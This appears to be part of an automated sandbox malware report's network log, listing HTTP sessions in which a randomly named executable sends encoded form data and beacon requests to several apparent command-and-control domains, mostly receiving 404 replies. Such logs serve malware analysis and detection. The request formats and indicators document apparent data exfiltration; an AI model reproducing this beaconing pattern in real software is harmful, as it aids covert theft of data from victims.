                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:18.655910969 CEST | 568 | OUT | GET /3bdq/?7lpPGx=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&QF4tL=lBP8AZrpnb HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.kexweb.top
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:38:19.231906891 CEST | 610 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:19 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 389
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              21 | 192.168.2.7 | 52124 | 91.184.0.200 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:24.293692112 CEST | 847 | OUT | POST /ikh0/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jobworklanka.online
                                              Origin: http://www.jobworklanka.online
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.jobworklanka.online/ikh0/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Ascii: 7lpPGx=otZcyeHXRsUakctfudvHHXqlWG/6yRQhd1rL2TC/GjIouwn0B76eeoOda5nlGU9kM3iKDWjaIpHc0DyAMQWqhLmmOoNoogYrdjwtQ5n4bHLpq9wHtihl8rlx5RcIN1O31hib1lD0dH6IcO+1IcexI2RQ7ZWTH2PuBW6vkIMLWwei/OQ3a+6QjScvZ3r39x2NL57uZ2dhfM8rL5jKVA==
                                              Sep 25, 2024 11:38:24.903033018 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:24 GMT
                                              Server: Apache
                                              X-Xss-Protection: 1; mode=block
                                              Referrer-Policy: no-referrer-when-downgrade
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 196
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              22 | 192.168.2.7 | 52125 | 91.184.0.200 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:26.847807884 CEST | 867 | OUT | POST /ikh0/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jobworklanka.online
                                              Origin: http://www.jobworklanka.online
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.jobworklanka.online/ikh0/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Ascii: 7lpPGx=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGWgovRX0A66eTIOdQZngL097M3uCDXPaIpjc0DCANnipnbmoV4NQlAYrdjwtQ5yjbGvprNAHvHNk2LlwpxcIfFOz1hj81keTdB2IcMm1IJrnD2Q615XZEmr+Pk2rh7AKQxu03YNVAc289DkUd1PBqXr4J4/2UUpAA7ZBGrCOD3ByTmfmHMWIy49etweOFpE=
                                              Sep 25, 2024 11:38:27.458257914 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:27 GMT
                                              Server: Apache
                                              X-Xss-Protection: 1; mode=block
                                              Referrer-Policy: no-referrer-when-downgrade
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 196
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              23 | 192.168.2.7 | 52126 | 91.184.0.200 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:29.395831108 CEST | 1880 | OUT | POST /ikh0/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jobworklanka.online
                                              Origin: http://www.jobworklanka.online
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.jobworklanka.online/ikh0/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Ascii: 7lpPGx=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGW4ovjf0AZSecoOdLZnhL09yMzCGDXytIvncyg6AEz+ppbmocYNrogY+djApQ5ijbGvprOYHmyhkwLlx5RcEN1OX1lHG1kapcxWIbs21EbDnBWRc25WMEmW5Pk6dh6EgQy+00u4zFoqVq1wScUXfgE6LNIOLRWBwI8ZXf7ybGSM+MFzLHuux2/425iyYRf4AyzC8aMKNh15jmZTVvk2H+VX8yeYx6Ij6ayKrxU0pp/gYBG861lbIoF5+S6Nc3hgZCnOXd9cFTNnDgp2otGSjGK9i3T2lG9cqxKXzvCuhyrMdmvphYxSFy4Kh3dHOT4jxH/fs9nKo0qilH97dwfVd1ZsaCd+/p+XveUde/hCZBm/IdUtB08OFUTAI4lquo0oot8IoJ1M23GH0S8rSDweVPovR9QYadj86sVwYJ3Gw4S/urFOSvecZZnTIUAfocJZY8tRqbU7CmkIrhNHOE+cxSMfsqj7z+dFjGex7ZgmJhoPF4qPjGjbeGSECkpYmv1a/TR1i1B3ap80WEv4UpcCghQbbFgZ0oIg+gtH1N/X2K44Kw3v8sHyFcGHPWBZdrq0vuQPykimpPh1ZDLWOOktirAffolVKaQhbbBpxechtTGVzkvuOaZvK7uuG8fiwMuC7VAZ0RraqlTAqNjkxFbe5PMLjpOMUsGgqWzTqfq1nN2NlMVpYCWNEKpK+S7ncN0SSrZatVUkyYPgL0SzrbEysPnDCUlZ+pV47VoUovHxS45q8xiBkOJVaDSy1x8khiFKv2lsnJwKv/VkNaphT4khII+SRJ5l6Q1S+Qc+IsrV3i/IMdwz4DlBtutJ4T25JzsP9zhE/HPAoIJehj32y8Fg0jgPid6CDON3+8daeECOZ3Ovw1KzB9PKR91OgU781parij5Zkekejf5foknwOJz5GjCFyit1CjaN+0ZUQkMDbnYGp1JvQ5ir5d3ZHuXRPrhepCb/W1 [TRUNCATED]
                                              Sep 25, 2024 11:38:30.000355005 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:29 GMT
                                              Server: Apache
                                              X-Xss-Protection: 1; mode=block
                                              Referrer-Policy: no-referrer-when-downgrade
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 196
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              24 | 192.168.2.7 | 52127 | 91.184.0.200 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:31.940078974 CEST | 577 | OUT | GET /ikh0/?QF4tL=lBP8AZrpnb&7lpPGx=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uJuIaoF4jHIQUSYKPYHcUgvqmMBPmFsZ+bgj1yNrVQypjRbF20O0Zy39 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jobworklanka.online
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:38:32.550679922 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:32 GMT
                                              Server: Apache
                                              X-Xss-Protection: 1; mode=block
                                              Referrer-Policy: no-referrer-when-downgrade
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 196
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              25 | 192.168.2.7 | 52128 | 13.248.169.48 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:37.915832043 CEST | 817 | OUT | POST /h7lb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.dyme.tech
                                              Origin: http://www.dyme.tech
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.dyme.tech/h7lb/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Ascii: 7lpPGx=cZnnZ5lw9mVosJSJb/kT3H7G7UytJnuz6UFc47FTMoDJksYXsHUXIw9PvV1gx8VRZSwqmzvx0EGz+IQRbsz1aOw8iKnLtNoasw4J8YmB9O4fVIBC/06ko8+iDWFUNDTIvJdHu9hAGnVUjThiWdFF92PdAyCFjc0Ktt4C8ziVBuAdLYSIkP1U3I0J0wshnFIIphvQDucj/KzX7jkXXQ==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              26 | 192.168.2.7 | 52129 | 13.248.169.48 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:40.515198946 CEST | 837 | OUT | POST /h7lb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.dyme.tech
                                              Origin: http://www.dyme.tech
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.dyme.tech/h7lb/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Ascii: 7lpPGx=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DManJlOQXvGUXLw9P6l1l18VGZS0Um3rx0ECz+KIRb7n6bewipqnNjtoasw4J8cGr9OgfV4xC+Wellc+hTGFUGjTMvJd1u4ElGltUjSxiHvtE22PbOSCRgOsa1scE1Q+7M9QqKuPq+t54pZMywyIXwjV9rgrIOMoCg9W92xFTBkMmFdXdkEM5hnCiuQGTWlQ=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              27 | 192.168.2.7 | 52130 | 13.248.169.48 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:43.068074942 CEST | 1850 | OUT | POST /h7lb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.dyme.tech
                                              Origin: http://www.dyme.tech
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.dyme.tech/h7lb/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Ascii: 7lpPGx=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DMavJk9IXsl8XKw9Pm11k18V+ZSNTm3nH0Gqz8pARLan6RewimKnItNoPswJC8Yir9OgfV+dC5E6lnc+iDWFINDTkvI1fu4BQGRZUkyBiF6xEqmPZNSDWgORd1sB71TiRM/AqLrSsquRf7/kt6iQg7SpxyDfTOs4ksd2f9HlaMAlYR/HQqQpvkweq8BmbUi75tHYxf+C+nwdLPX3z32ssXn6q0DAYn8YWeYrzb2hhLOU6yOEm+dIXrEIZ59jpaFeIm8flHTxhDoYRWJ0xBGkD7IR5SvcE7CtVgp2K99SCM65sdBt7AlsktZeF79krTExzicIb+lgz0nILLi84nKkxRK8pO+3vtgMiC4p2ppuRUiXYSDjl0+hzPGCcty5wix2W1vqqC80hPb2FawVR3+zuKB7TdJ/bqZMOEew2MFomKjadc7mb0svIFhVgmm9vi2ELWEnY1wHpsD+O31YvFDFDIM854zzCZV4dN5psnjrSD1TExrarUjbp0T5rYzfb+G/m+YJVLZrgyZMwHz2AASGWfEcJTh1CPMBn+VVHVzHsde7MWFFTlqrDudR6+HrXUgSVOAJaVBxiUMRCgeQPXrc2u0cxLtlJW5gBw70WLXDFF4Rs2+6NmB2lo08DJpNSi3BGTeuZPUOmyBmjiJnaCjyohdkykxZDybrHOuHw7xcnf3cshiF+Iyj+jkoxDLM852yHfR5sRbiJL8Ig2mbJs4wTZWYzBiZL9chwm3LjSS7iezQs0cIep8ydX7RN6ayNPeJ3i8HoydTViOwjrN3GkjHlIXFlXS6hZolMPaIgEdp4Q9NfFBY6UE3q95SBennDeumeKIzOxkz+o2GgbzDDSVbBFjI9QwXWGuRJ4PIS3wHdtQKpk9dExmkYUsao3pE/nF8O/eduqCzdXmPxbZCfbYrHL3ukWmafyrm/pFnXyyCpT2l9PzVhPq5z08687aSiIbB40Zy8u [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              28 | 192.168.2.7 | 52131 | 13.248.169.48 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:38:45.607721090 CEST | 567 | OUT | GET /h7lb/?7lpPGx=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U+kUuYrzibwk/zciraOv0fsIaYVE1FLZq7mKJVkZI1PP5pVux7ZkM0kP&QF4tL=lBP8AZrpnb HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.dyme.tech
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:38:46.060394049 CEST | 419 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Wed, 25 Sep 2024 09:38:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 279
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7lpPGx=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U+kUuYrzibwk/zciraOv0fsIaYVE1FLZq7mKJVkZI1PP5pVux7ZkM0kP&QF4tL=lBP8AZrpnb"}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              29 | 192.168.2.7 | 52136 | 43.242.202.169 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:39:05.249061108 CEST | 826 | OUT | POST /e0nr/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mizuquan.top
                                              Origin: http://www.mizuquan.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.mizuquan.top/e0nr/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Ascii: 7lpPGx=H9Rq2Rs7eYeiaKtXc218kEAY/Tms3qEIhUwZwszkwrAkzTZedzdPGVzuaO7KppSGDcRF86vHiJdBGcB2Z9F+E280c4SF4L0a3UNiQRCGP/aP3RHLu6nsbXQ9eelwXadt0oM6PS7EOOvHmEPG/UWSKi+mENVAyoQoPdE/O4H3F3xGgMeqrD5KUJoNd1QHquIKFN1j/LpqVzOh29HV3A==
                                              Sep 25, 2024 11:39:06.101471901 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:39:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              30 | 192.168.2.7 | 52137 | 43.242.202.169 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:39:07.796490908 CEST | 846 | OUT | POST /e0nr/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mizuquan.top
                                              Origin: http://www.mizuquan.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.mizuquan.top/e0nr/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Ascii: 7lpPGx=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w9wk9XdePCdPL1zuIu7PxJSdDcVj847HiJZBGYF2ZKp9Cm82a4SL770a3UNiQQm4P/iP3CPLvYPvEnQ+Zelwa6dh0oMYPXTuOMHHmEfG/GuTBi+sKtUB2ohPN9NAXJ/6dWBQh6DIxh1mKYQ2Z30x9IV/HMx7ypdLKErL7vmRh+e7Eyvux+FWE0FdM7Dd6dQ=
                                              Sep 25, 2024 11:39:08.656403065 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:39:08 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              31 | 192.168.2.7 | 52138 | 43.242.202.169 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:39:10.350511074 CEST1859OUTPOST /e0nr/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mizuquan.top
                                              Origin: http://www.mizuquan.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.mizuquan.top/e0nr/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 34 6b 39 6b 56 65 65 52 46 50 4b 31 7a 75 54 75 37 4f 78 4a 54 46 44 59 42 2f 38 34 32 38 69 4c 52 42 48 39 52 32 66 34 52 39 4d 6d 38 32 59 34 53 47 34 4c 31 43 33 55 64 75 51 52 57 34 50 2f 69 50 33 45 72 4c 70 4b 6e 76 47 6e 51 39 65 65 6c 4b 58 61 64 4e 30 6f 30 69 50 58 58 55 4f 39 6e 48 6e 6c 76 47 39 7a 43 54 64 79 2b 71 48 4e 56 53 32 6f 74 51 4e 39 51 7a 58 4a 4b 74 64 56 52 51 73 76 71 74 69 77 70 61 51 6f 51 6a 58 48 55 30 2b 61 6c 72 4e 2f 4e 55 7a 62 4e 71 41 31 33 57 30 4e 6e 46 73 62 66 4d 52 67 65 51 33 4d 31 74 46 6b 30 6c 64 4f 62 34 74 71 70 6e 65 65 74 57 30 51 64 67 52 75 39 6b 49 51 62 38 61 55 56 58 2b 69 41 74 50 45 43 32 65 58 48 73 54 49 2b 44 6d 4e 6c 35 2f 6b 54 35 4b 38 52 54 37 41 62 4c 4a 50 33 5a 46 69 38 33 35 46 6e 4d 45 68 72 50 65 76 47 62 69 64 75 41 61 66 6a 74 4c 5a 2b 35 4b 7a 47 34 6b 79 34 71 6c 52 45 30 65 6e 58 [TRUNCATED]
                                              Data Ascii: 7lpPGx=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 [TRUNCATED]
                                              Sep 25, 2024 11:39:11.201750040 CEST  691                IN         HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:39:11 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
